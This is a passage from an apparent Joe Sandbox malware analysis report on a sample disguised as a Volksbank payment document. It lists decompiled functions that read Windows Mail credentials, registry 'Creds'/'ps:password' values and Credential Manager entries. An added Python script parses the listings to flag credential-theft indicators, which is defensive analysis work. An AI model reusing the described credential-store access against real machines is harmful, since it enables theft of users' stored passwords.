                                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                                                                          • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                                                                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                                                                                          • API String ID: 1012775001-1343505058
                                                                                                                                                                                                                                          • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                                                                                                                                          • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strcmpi
                                                                                                                                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                                          • API String ID: 1439213657-1959339147
                                                                                                                                                                                                                                          • Opcode ID: fc398c435b3d1a27aa6bafcedfb0a9c88799152dfe3da8b7518a640bbec7b317
                                                                                                                                                                                                                                          • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc398c435b3d1a27aa6bafcedfb0a9c88799152dfe3da8b7518a640bbec7b317
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00444612
                                                                                                                                                                                                                                            • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00444668
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00444690
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                                                                          • String ID: salu
                                                                                                                                                                                                                                          • API String ID: 3691931180-4177317985
                                                                                                                                                                                                                                          • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                                                                                                                                          • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                          • API String ID: 2449869053-232097475
                                                                                                                                                                                                                                          • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                                                                          • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
• strlen.MSVCRT ref: 00443AD2
• ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
• memset.MSVCRT ref: 00443B2E
• memset.MSVCRT ref: 00443B4B
• _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
• RegCloseKey.ADVAPI32(?), ref: 00443BBD
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
• LocalFree.KERNEL32(?), ref: 00443C23
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
  • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
Strings
• Software\Microsoft\Windows Mail, xrefs: 00443B61
• Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
• Salt, xrefs: 00443BA7
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
• String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
• API String ID: 665470638-2687544566
• Opcode ID: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
• Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
• Opcode Fuzzy Hash: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
• Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
APIs
• RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
• memset.MSVCRT ref: 0040F84A
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
• RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
• LocalFree.KERNEL32(?), ref: 0040F92C
• RegCloseKey.ADVAPI32(?), ref: 0040F937
• RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
• RegCloseKey.ADVAPI32(?), ref: 0040F95F
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
• String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
• API String ID: 551151806-1288872324
• Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
• Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
• Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
• Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
APIs
  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76940A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76940A60), ref: 00406D4D
• memset.MSVCRT ref: 00403ECE
• memset.MSVCRT ref: 00403EE2
• memset.MSVCRT ref: 00403EF6
• sprintf.MSVCRT ref: 00403F17
• _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
• sprintf.MSVCRT ref: 00403F6A
• sprintf.MSVCRT ref: 00403F9B
Strings
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
• <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45
• <table dir="rtl"><tr><td>, xrefs: 00403F2D
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memsetsprintf$FileWrite_mbscpystrlen
• String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
• API String ID: 113626815-1670831295
• Opcode ID: b2fae93db892e93611053a9993d135149b989cdc37ddc67be39363e78f3e4061
• Instruction ID: 68eec6ff6ffa0e14b7f0c60be0e91221167be1d604113ab21f184662466f1ff3
• Opcode Fuzzy Hash: b2fae93db892e93611053a9993d135149b989cdc37ddc67be39363e78f3e4061
• Instruction Fuzzy Hash: 0931A5B3D00258BEEB50DB54CC82FDE77ACEF54305F1001ABF548A3141DA78AB888B69
APIs
• sprintf.MSVCRT ref: 0040957B
• LoadMenuA.USER32(?,?), ref: 00409589
  • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
  • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
  • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
  • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
• DestroyMenu.USER32(00000000), ref: 004095A7
• sprintf.MSVCRT ref: 004095EB
• CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
• memset.MSVCRT ref: 0040961C
• GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
• EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
• DestroyWindow.USER32(00000000), ref: 0040965C
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
• String ID: caption$dialog_%d$menu_%d
• API String ID: 3259144588-3822380221
• Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
• Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
• Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
• Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
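The function listings above are a small slice of a very long report, and the credential-harvesting routines (the Windows Mail / Windows Live Mail registry reader with its Salt value, the Creds / ps:password registry walker, and the function that resolves CredReadA and CredEnumerateA from advapi32.dll at runtime) are easy to miss among thousands of similar entries. The script below is an added triage example, not part of the Joe Sandbox report or of the Remcos sample: it parses the APIs / Strings blocks in exactly the format shown here and flags functions whose arguments, strings, or GetProcAddress targets match the credential-store indicators seen in these listings. The sample input is a constructed, abridged copy of the listing format, and the indicator lists are a heuristic built only from strings present on this page.

```python
"""Added example: triage the per-function API/string listings of a Joe Sandbox report.

Not part of the report or the sample. Parses the 'APIs'/'Strings' blocks of the
IDA-plugin listing format shown on this page and flags functions whose calls or
strings point at credential stores.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: an abridged copy of the listing format on this page.
SAMPLE_REPORT = r"""APIs
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
• strlen.MSVCRT ref: 00443AD2
• ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
• _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
• RegCloseKey.ADVAPI32(?), ref: 00443BBD
Strings
• Software\Microsoft\Windows Mail, xrefs: 00443B61
• Salt, xrefs: 00443BA7
Similarity
• API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
APIs
• RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040), ref: 0040F82C
• RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
Strings
Memory Dump Source
APIs
• sprintf.MSVCRT ref: 0040957B
• LoadMenuA.USER32(?,?), ref: 00409589
Strings
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
• GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
• GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• [Part of subcall function XXXXXXXX: ]Name.MODULE[(args)][,] ref: XXXXXXXX"
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Za-z0-9]+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})"
)
STRING_RE = re.compile(r"•\s*(?P<text>.*), xrefs: [0-9A-Fa-f]{8}")  # "• text, xrefs: XXXXXXXX"

# Heuristic indicators taken from the listing itself (assumption: this short list
# is enough for triage; extend it for other targets).
MAIL_CRED_PATHS = (r"Software\Microsoft\Windows Live Mail", r"Software\Microsoft\Windows Mail")
CRED_VALUE_NAMES = ("ps:password", "Creds", "Salt")
CREDMAN_IMPORTS = ("CredReadA", "CredEnumerateA", "CredDeleteA")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    caller: Optional[str] = None  # set for "Part of subcall function" lines


@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)

    @property
    def key(self) -> str:
        """Label the function by the ref of its first direct (non-subcall) API call."""
        direct = [c for c in self.apis if c.caller is None]
        if direct:
            return direct[0].ref
        return self.apis[0].ref if self.apis else "?"


def parse_report(text: str) -> List[FunctionEntry]:
    """One FunctionEntry per 'APIs' block; bullets in other sections are ignored."""
    entries: List[FunctionEntry] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            section = line
            if line == "APIs":
                entries.append(FunctionEntry())
        elif entries and section == "APIs" and (m := API_RE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            entries[-1].apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
        elif entries and section == "Strings" and (m := STRING_RE.match(line)):
            entries[-1].strings.append(m["text"])
    return entries


def credential_findings(entry: FunctionEntry) -> List[str]:
    """Reasons a function looks like credential harvesting (empty if none)."""
    findings: List[str] = []
    haystack: List[str] = list(entry.strings)
    for call in entry.apis:
        haystack.extend(call.args)
        # Credential Manager exports resolved at runtime never appear as direct
        # calls, so inspect the name passed to GetProcAddress instead.
        if call.name == "GetProcAddress" and len(call.args) >= 2 and call.args[1] in CREDMAN_IMPORTS:
            findings.append(f"resolves {call.args[1]} via GetProcAddress at {call.ref}")
    for item in haystack:
        if item in MAIL_CRED_PATHS:
            findings.append(f"touches mail credential registry path {item}")
        elif item in CRED_VALUE_NAMES:
            findings.append(f"references credential value name {item}")
    return findings


def triage(text: str) -> Dict[str, List[str]]:
    """Map each flagged function (by first direct ref address) to its findings."""
    result: Dict[str, List[str]] = {}
    for entry in parse_report(text):
        findings = credential_findings(entry)
        if findings:
            result[entry.key] = findings
    return result


if __name__ == "__main__":
    for func, why in triage(SAMPLE_REPORT).items():
        print(func, "->", "; ".join(why))
```

Run against the full report text instead of the embedded sample, the same three kinds of functions surface (mail registry reader, Creds / ps:password walker, Credential Manager resolver) while the HTML-report writer and the menu / dialog enumerator, which share many of the same C runtime calls, stay unflagged; matching on arguments and GetProcAddress targets rather than on API names alone is what separates them.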
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                                                                          • API String ID: 2449869053-4258758744
                                                                                                                                                                                                                                          • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                                                          • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
APIs
• wcsstr.MSVCRT ref: 0040426A
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
• _mbscpy.MSVCRT(?,?), ref: 004042D5
• _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
• strchr.MSVCRT ref: 004042F6
• strlen.MSVCRT ref: 0040430A
• sprintf.MSVCRT ref: 0040432B
• strchr.MSVCRT ref: 0040433C
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
• String ID: %s@gmail.com$www.google.com
• API String ID: 3866421160-4070641962
• Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
• Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
• Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
• Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
APIs
• _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
• _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
  • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
  • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
  • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
• EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
• EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
• _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
• memset.MSVCRT ref: 004097BD
• LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
• String ID: TranslatorName$TranslatorURL$general$strings
• API String ID: 1035899707-3647959541
• Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
• Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
• Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
